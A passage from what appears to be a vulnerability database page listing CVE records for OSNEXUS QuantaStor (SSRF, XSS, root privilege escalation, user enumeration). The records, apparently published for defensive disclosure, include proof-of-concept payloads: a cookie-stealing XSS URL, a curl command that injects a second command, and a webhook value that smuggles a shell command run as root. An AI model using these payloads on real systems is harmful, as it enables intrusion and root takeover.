####\n\n\u2003\u0027endpoint\u0027: \u0027index\u0027, \n\u2003\n\u0027method\u0027: \u0027POST\u0027, \n\u2003\n\u0027cookies\u0027: ImmutableMultiDict([]), \n\u2003\n### END Python FLASK stuff ####\n\n\u2003\n\u0027data\u0027: b\u0027{ \n\u2003\u2003\"attachments\": [ \n\u2003\u2003\u2003{\n\n\u2003\u2003\u2003\u2003\"fallback\": \"[122] test / test.\",\n\n\u2003\u2003\u2003\u2003\"color\": \"#aa2222\",\n\n\u2003\u2003\u2003\u2003\"title\": \"[122] test\",\n\n\u2003\u2003\u2003\u2003\"text\": \"test\",\n\n\u2003\u2003\u2003\u2003\"fields\": [ \u00a0 \n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Alert Severity\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"CRITICAL\",\n \u00a0 \u00a0\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"Appliance\", \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"quantastor (https://\u003cHOSTNAME\u003e)\",\n \u00a0 \u00a0 \n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System / Driver / Kernel Ver\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": false \u00a0\n\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"System Startup\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"Fri Aug \u00a06 16-02-55 2021\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003 }, \u00a0{ \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"title\": \"SSID\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\", \u00a0 \u00a0\n\n\u2003\u2003\u2003\u2003\u2003\u2003\"short\": true \u00a0\n\n\u2003\u2003\u2003\u2003\u2003},\n\u2003\u2003\u2003\u2003],\n\n\u2003\u2003\u2003\u2003\"footer\": \"QuantaStor Call-home Alert\",\n\n\u2003\u2003\u2003\u2003\"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n\u2003\u2003\u2003\u2003\"ts\": 1628461774\n\u2003\u2003\u2003}\n\u2003\u2003], \n\u2003\u2003\"mrkdwn\":true \n\u2003}\u0027, \n\u2003#### FLASK REQUEST STUFF #####\n\n\u2003\u0027headers\u0027: {\n\n\u2003\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \n\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \n\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \n\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \n\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\n\n\u2003}, \n\u2003\u0027args\u0027: ImmutableMultiDict([]), \n\u2003\u0027form\u0027: ImmutableMultiDict([]), \n\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \n\u2003\u0027path\u0027: \u0027/payload/58\u0027, \n\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\n}\n\n#### END FLASK REQUEST STUFF #####"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T06:40:03.059Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"exploit",
"technical-description"
],
"url": "https://cisrt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-42079"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-42079",
"datePublished": "2023-07-10T06:29:48.339Z",
"dateReserved": "2021-10-07T17:12:57.677Z",
"dateUpdated": "2025-09-22T06:40:03.059Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-42080 (GCVE-0-2021-42080)
Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI?
Title
Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Summary
An attacker is able to launch a Reflected XSS attack using a crafted URL.
POC:
Visit the following URL
https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>
Severity ?
7.4 (High)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OSNEXUS | QuantaStor |
Affected:
0 , < 6.0.0.355
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:25.845Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-42080"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-42080",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-21T21:06:56.590163Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-21T21:10:56.435Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An attacker is able to launch a Reflected XSS attack using a crafted URL.\u003cbr\u003e\u003cbr\u003ePOC:\u003cbr\u003e\u003cbr\u003eVisit the following URL\u003cbr\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cpre\u003e\u003cdiv\u003ehttps://\u0026lt;IPADDRESS\u0026gt;:8153/qstorapi/echo?inputMessage=\u0026lt;img%20src=x%20onerror=alert(document.cookie)\u0026gt;\u003c/div\u003e\u003c/pre\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e"
}
],
"value": "An attacker is able to launch a Reflected XSS attack using a crafted URL.\n\nPOC:\n\nVisit the following URL\nhttps://\u003cIPADDRESS\u003e:8153/qstorapi/echo?inputMessage=\u003cimg%20src=x%20onerror=alert(document.cookie)\u003e"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T06:40:04.494Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"technical-description",
"exploit"
],
"url": "https://csirt.divd.nl/CVE-2021-42080"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Reflected XSS vulnerability in OSNEXUS QuantaStor before 6.0.0.355",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-42080",
"datePublished": "2023-07-10T06:29:48.166Z",
"dateReserved": "2021-10-07T17:12:57.677Z",
"dateUpdated": "2025-09-22T06:40:04.494Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-42082 (GCVE-0-2021-42082)
Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI?
Title
Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355
Summary
Local users are able to execute scripts under root privileges.
POC
On the local host run the following command:
curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'
Severity ?
7.8 (High)
CWE
- CWE-269 - Improper Privilege Management
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OSNEXUS | QuantaStor |
Affected:
0 , < 6.0.0.355
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:25.967Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-42082"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-42082",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-12T14:16:04.030763Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-12T14:16:12.694Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://www.osnexus.com/downloads",
"defaultStatus": "unknown",
"platforms": [
"Windows",
"Linux"
],
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Local users are able to execute scripts under root privileges.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eOn the local host run the following command:\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgba(29, 28, 29, 0.04);\"\u003ecurl \u0027localhost:8154/qstor/qs_upgrade.py?taskId=1\u0026amp;a=;`whoami`\u0027\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "Local users are able to execute scripts under root privileges.\n\nPOC\n\nOn the local host run the following command:\n\ncurl \u0027localhost:8154/qstor/qs_upgrade.py?taskId=1\u0026a=;`whoami`\u0027"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-269",
"description": "CWE-269 Improper Privilege Management",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T06:40:10.543Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory",
"technical-description",
"exploit"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"technical-description",
"exploit"
],
"url": "https://csirt.divd.nl/CVE-2021-42082"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-42082",
"datePublished": "2023-07-10T06:29:47.984Z",
"dateReserved": "2021-10-07T17:12:57.678Z",
"dateUpdated": "2025-09-22T06:40:10.543Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-42083 (GCVE-0-2021-42083)
Vulnerability from cvelistv5 – Published: 2023-07-10 06:29 – Updated: 2025-09-22 06:40
VLAI?
Title
Authenticated Stored XSS in OSNEXUS QuantaStor 6.0.0.335
Summary
An authenticated attacker is able to create alerts that trigger a stored XSS attack.
POC
* go to the alert manager
* open the ITSM tab
* add a webhook with the URL/service token value
' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters)
* click add
* click apply
* create a test alert
* The test alert will run the command
“id | tee /tmp/ttttttddddssss” as root.
* after the test alert inspect
/tmp/ttttttddddssss it'll contain the ids of the root user.
Severity ?
8.7 (High)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OSNEXUS | QuantaStor |
Affected:
0 , < 6.0.0.355
(semver)
|
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:22:25.878Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.divd.nl/DIVD-2021-00020"
},
{
"tags": [
"product",
"x_transferred"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-42083"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"platforms": [
"Windows",
"Linux"
],
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "C\u00e9listine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authenticated attacker is able to create alerts that trigger a stored XSS attack.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003ego to the alert manager\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"background-color: transparent;\"\u003eopen the ITSM tab\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eadd a webhook with the URL/service token value \u003c/span\u003e\u003c/p\u003e\u003ctt\u003e\u003cspan style=\"background-color: transparent;\"\u003e\u0027\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003e-h\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003eid\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003e|\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003etee\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003e/tmp/ttttttddddssss\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003e#\u0027\u003c/span\u003e\u003c/tt\u003e\u003cp\u003e \u003cspan style=\"background-color: transparent;\"\u003e(whitespaces are tab characters)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eclick add\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eclick apply\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003ecreate a test alert\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003eThe test alert will run the command \u003c/span\u003e\u003c/p\u003e\u003ctt\u003e\u003cspan style=\"background-color: transparent;\"\u003e\u201c\u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003eid\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003e|\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003etee\u003c/span\u003e\t\u003cspan style=\"background-color: transparent;\"\u003e/tmp/ttttttddddssss\u003c/span\u003e\u003cspan style=\"background-color: transparent;\"\u003e\u201d\u003c/span\u003e\u003c/tt\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003e as root.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003e\u003cspan style=\"background-color: transparent;\"\u003eafter the test alert inspect \u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003ctt\u003e/tmp/ttttttddddssss\u003c/tt\u003e\u003cp\u003e\u003cspan style=\"background-color: transparent;\"\u003e \u003cspan style=\"background-color: transparent;\"\u003eit\u0027ll contain the ids of the root user.\u003c/span\u003e\u003cbr\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cb\u003e\u003c/b\u003e\u003cbr\u003e"
}
],
"value": "An authenticated attacker is able to create alerts that trigger a stored XSS attack.\n\nPOC\n\n\n * go to the alert manager\n\n\n * open the ITSM tab\n * add a webhook with the URL/service token value \n\n\u0027\t-h\t\u0026\u0026\tid\t|\ttee\t/tmp/ttttttddddssss\t#\u0027 (whitespaces are tab characters)\n\n\n * click add\n\n\n * click apply\n\n\n * create a test alert\n\n\n * The test alert will run the command \n\n\u201cid\t|\ttee\t/tmp/ttttttddddssss\u201d as root.\n\n\n * after the test alert inspect \n\n/tmp/ttttttddddssss it\u0027ll contain the ids of the root user."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-22T06:40:07.586Z",
"orgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"shortName": "DIVD"
},
"references": [
{
"tags": [
"third-party-advisory",
"technical-description",
"exploit"
],
"url": "https://www.wbsec.nl/osnexus"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00020/"
},
{
"tags": [
"product"
],
"url": "https://www.osnexus.com/products/software-defined-storage"
},
{
"tags": [
"third-party-advisory",
"exploit",
"technical-description"
],
"url": "https://csirt.divd.nl/CVE-2021-42083"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"value": "Upgrade to the latest version of OSNEXUS QuantaStor."
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "Authenticated Stored XSS in OSNEXUS QuantaStor 6.0.0.335",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"assignerShortName": "DIVD",
"cveId": "CVE-2021-42083",
"datePublished": "2023-07-10T06:29:47.782Z",
"dateReserved": "2021-10-07T17:12:57.678Z",
"dateUpdated": "2025-09-22T06:40:07.586Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-9978 (GCVE-0-2017-9978)
Vulnerability from cvelistv5 – Published: 2017-08-28 19:00 – Updated: 2024-08-05 17:25
VLAI?
Summary
On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, a flaw was found with the error message sent as a response for users that don't exist on the system. An attacker could leverage this information to fine-tune and enumerate valid accounts on the system by searching for common usernames.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Date Public ?
2017-08-12 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T17:25:00.517Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt"
},
{
"name": "42517",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42517/"
},
{
"name": "20170815 QuantaStor Software Define Storage mmultiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2017/Aug/23"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-12T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, a flaw was found with the error message sent as a response for users that don\u0027t exist on the system. An attacker could leverage this information to fine-tune and enumerate valid accounts on the system by searching for common usernames."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.vvvsecurity.com/advisories/vvvsecurity-advisory-2017-6943.txt"
},
{
"name": "42517",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42517/"
},
{
"name": "20170815 QuantaStor Software Define Storage mmultiple vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2017/Aug/23"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/143780/OSNEXUS-QuantaStor-4-Information-Disclosure.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-9978",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
